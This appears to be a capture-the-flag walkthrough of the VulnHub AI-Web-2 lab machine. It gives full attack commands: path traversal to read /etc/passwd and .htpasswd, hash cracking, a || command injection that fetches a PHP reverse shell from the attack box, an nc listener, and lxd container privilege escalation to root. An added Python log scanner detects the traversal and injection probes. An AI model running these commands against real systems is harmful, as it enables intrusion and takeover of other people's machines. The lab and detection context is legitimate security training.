This week's exercise is the VulnHub AI-Web-2 image.
Download address: https://download.vulnhub.com/aiweb/AI-Web-2.0.7z
Imported into VMware Workstation successfully.
Host discovery: sudo netdiscover -r 192.168.220.0/24
The target's address is 192.168.220.169.
Next, port scan: sudo nmap -sS -sV -T5 -A -p- 192.168.220.169
The target exposes an SSH service on port 22 and an HTTP service on port 80.
Open http://192.168.220.169 in the browser.
Register with the username admin, then log in.
The application identifies itself as XuezhuLi FileSharing.
Search online for known vulnerabilities in XuezhuLi FileSharing and how they are exploited.
In the browser, request http://192.168.220.169/viewing.php?file_name=../../../../../../../../../../../../../etc/passwd
Then request http://192.168.220.169/viewing.php?file_name=../../../../../../../../../../../../../etc/apache2/.htpasswd
This returns the web login account and its password hash.
Save the hash to hash.txt and download a password wordlist as dict.txt:
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt
Crack it: john --wordlist=dict.txt hash.txt
Result: aiweb2admin/c.ronaldo
Continue with directory brute-forcing of the HTTP service: dirb http://192.168.220.169
It finds http://192.168.220.169/webadmin
Open http://192.168.220.169/webadmin in the browser and log in.
A hint says there is information in the robots file.
Request http://192.168.220.169/webadmin/robots.txt
It reveals the path /H05Tpin9555/
Open http://192.168.220.169/webadmin/H05Tpin9555/
The page accepts command input; trying || id succeeds.
Prepare a reverse-shell script on the Kali attack box:
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
python2 -m SimpleHTTPServer
Submit || wget http://192.168.220.157:8000/shell.php
Check the result: || ls
Start the reverse-shell listener on the Kali attack box: nc -lvp 4444
Request http://192.168.220.169/webadmin/H05Tpin9555/shell.php in the browser to receive the reverse shell, then locate the SSH username and password:
n0nr00tuser/zxowieoi4sdsadpEClDws1sf
Log in over SSH (ssh [email protected]) and notice that the user has lxd privileges.
On the Kali attack box, download the container image:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
Start an HTTP download service on the Kali attack box: python2 -m SimpleHTTPServer
On the target, change to the temporary directory: cd /tmp
Download the container image: wget http://192.168.220.157:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Import the container image: lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Verify: lxc image list
Initialize a privileged container: lxc init myimage ignite -c security.privileged=true
Mount the host's root filesystem into the container: lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Start the container instance: lxc start ignite
Enter the container instance: lxc exec ignite /bin/sh, then run id to confirm root.
Change to the mounted directory, cd /mnt/root/root, and capture the flag: cat flag.txt
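From the defender's side, the web phase of this walkthrough (the viewing.php path traversal reaching /etc/passwd and .htpasswd, then the || command probe) leaves clear traces in the Apache access log. The following added example, not part of the original post, scans constructed combined-format log lines for those probes; the "cmd" parameter name in the third sample line is a hypothetical placeholder, since the walkthrough does not name the form field.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines (not real traffic): the first two
# mirror the walkthrough's viewing.php traversal URLs, the third uses a
# hypothetical "cmd" parameter for the "|| id" probe, the last one is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /viewing.php?file_name=../../../../../../etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /viewing.php?file_name=..%2F..%2F..%2Fetc%2Fapache2%2F.htpasswd HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /webadmin/H05Tpin9555/?cmd=%7C%7C+id HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /viewing.php?file_name=report.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SENSITIVE = ("/etc/passwd", "/etc/shadow", ".htpasswd", "/etc/apache2/")
SHELL_META = re.compile(r'\|\||;|&&|`|\$\(')

def decode_fully(s, max_rounds=3):
    """Undo repeated percent-encoding so ..%252F is seen as ../ as well."""
    for _ in range(max_rounds):
        new = unquote(s)
        if new == s:
            break
        s = new
    return s

def classify(path):
    """Return the names of the rules a request path (with query) triggers."""
    decoded = decode_fully(path)
    hits = []
    if "../" in decoded or "..\\" in decoded:
        hits.append("path-traversal")
    if any(target in decoded for target in SENSITIVE):
        hits.append("sensitive-file")
    if SHELL_META.search(decoded):
        hits.append("shell-metachar")
    return hits

def scan(log_text):
    """Return (ip, status, path, rules) for each line that triggers a rule.
    A 200 on a traversal request means the file was really served, which is the
    strongest signal for the walkthrough's /etc/passwd and .htpasswd reads."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (rules := classify(m.group("path"))):
            alerts.append((m.group("ip"), m.group("status"), m.group("path"), rules))
    return alerts

if __name__ == "__main__":
    for ip, status, path, rules in scan(SAMPLE_LOG):
        print(ip, status, ",".join(rules), path)
```

The same alerts would also argue for fixing the root cause: validating file_name against an allow-list of served files rather than filtering ../ patterns.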
Originally published on the WeChat official account 云计算和网络安全技术实践 (Cloud Computing and Network Security Technology Practice): Working through VulnHub's AI-Web-2